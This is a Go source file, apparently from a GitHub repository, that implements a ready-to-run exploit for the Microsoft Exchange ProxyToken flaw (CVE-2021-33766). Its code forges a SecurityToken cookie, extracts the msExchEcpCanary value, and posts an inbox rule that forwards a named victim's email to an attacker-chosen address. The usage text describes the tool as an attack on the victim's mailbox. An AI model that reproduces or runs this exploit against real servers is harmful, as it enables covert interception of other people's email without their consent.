-
Notifications
You must be signed in to change notification settings - Fork 106
/
proxytoken.go
130 lines (111 loc) · 4.42 KB
/
proxytoken.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
package main
import (
"crypto/tls"
"flag"
"fmt"
"io/ioutil"
"net/http"
"strings"
"time"
"github.com/fatih/color"
)
func Banner() {
x := `
----------------------
< proxytoken (CVE-2021-33766) is awesome! >
----------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||`
y := "By lUc1f3r11"
color.Red("%s", x)
color.Yellow("%s", y)
}
func splitmsexch(msexch string) string {
msexch1 := strings.Split(msexch, "msExchEcpCanary=")
msexch2 := msexch1[len(msexch1)-1]
msexch3 := strings.Split(msexch2, ";")
msexch4 := msexch3[0]
return msexch4
}
func exploit(target, targetemail, victimemail string) {
user_agent := "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
/*构造payload*/
cli := &http.Client{Timeout: time.Second * 7, Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}}
if !strings.Contains(target, "http") {
target = "http://" + target
}
request, err := http.NewRequest(http.MethodGet, target+"/ecp/"+targetemail+"/PersonalSettings/HomePage.aspx?showhelp=false", nil)
if err != nil {
fmt.Println(err)
}
request.Header.Add("User-Agent", user_agent)
request.Header.Add("Connection", "close")
request.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
request.Header.Add("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2")
request.Header.Add("Accept-Encoding", "gzip, deflate")
request.Header.Add("Cookie", "SecurityToken=x")
request.Header.Add("Content-Type", "application/json; charset=utf-8")
do, err := cli.Do(request)
if err != nil {
fmt.Println("[-] requesting err...")
return
}
defer func() {
_ = do.Body.Close()
}()
if do.StatusCode == 200 {
fmt.Println("[+] req status: " + do.Status)
fmt.Println("[+] target Set-Cookie's msExchEcpCanary value is: " + splitmsexch(do.Header["Set-Cookie"][1]))
fmt.Println("[+] target is vulnerable to proxytoken (CVE-2021-33766) !")
postdata := `{"properties":{"RedirectTo":[{"RawIdentity":"` + targetemail + `","DisplayName":"` + targetemail + `","Address":"` + targetemail + `","AddressOrigin":0,"galContactGuid":null,"RecipientFlag":0,"RoutingType":"SMTP","SMTPAddress":"` + targetemail + `"}],"Name":"Testrule","StopProcessingRules":true}}`
request1, err := http.NewRequest(http.MethodPost, target+"/ecp/"+victimemail+"/RulesEditor/InboxRules.svc/Newobject?msExchEcpCanary="+splitmsexch(do.Header["Set-Cookie"][1]), strings.NewReader(postdata))
if err != nil {
fmt.Println(err)
}
request1.Header.Add("User-Agent", user_agent)
request1.Header.Add("Connection", "close")
request1.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
request1.Header.Add("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2")
request1.Header.Add("Accept-Encoding", "gzip, deflate")
request1.Header.Add("Cookie", "SecurityToken=x")
request1.Header.Add("Content-Type", "application/json; charset=utf-8")
fmt.Println("[+] adding redirect rule from " + victimemail + " to " + targetemail)
do1, err := cli.Do(request1)
if err != nil {
fmt.Println("[-] requesting err...")
return
}
if do1.StatusCode == 200 {
fmt.Println("[+] req status: " + do1.Status)
s, _ := ioutil.ReadAll(do1.Body)
fmt.Println("[+] the rule adding response text: " + string(s))
fmt.Println("[+] target Set-Cookie's msExchEcpCanary value is: " + splitmsexch(do.Header["Set-Cookie"][1]))
fmt.Println("[+] set email redirection rule successed !")
} else {
fmt.Println("[-] req status: " + do1.Status)
fmt.Println("[-] set email redirection rule failed !")
}
} else {
fmt.Println("[-] req status: " + do.Status)
fmt.Println("[-] target is not vulnerable to proxytoken (CVE-2021-33766) !")
}
}
func main() {
Banner()
var target, targetemail, victimemail string
flag.StringVar(&target, "u", "", "")
flag.StringVar(&targetemail, "te", "", "")
flag.StringVar(&victimemail, "ve", "", "")
flag.CommandLine.Usage = func() {
fmt.Println("usage:\nexec: ./proxytoken -u <target url> -te <redirect to targetemail> -ve <attack on victimemail>\n")
}
flag.Parse()
if len(target) == 0 {
fmt.Println("[+] please enter the url you want to check!!!")
fmt.Println("[+] Author: https://github.com/FDlucifer, https://twitter.com/fdlucifer11")
}
exploit(target, targetemail, victimemail)
}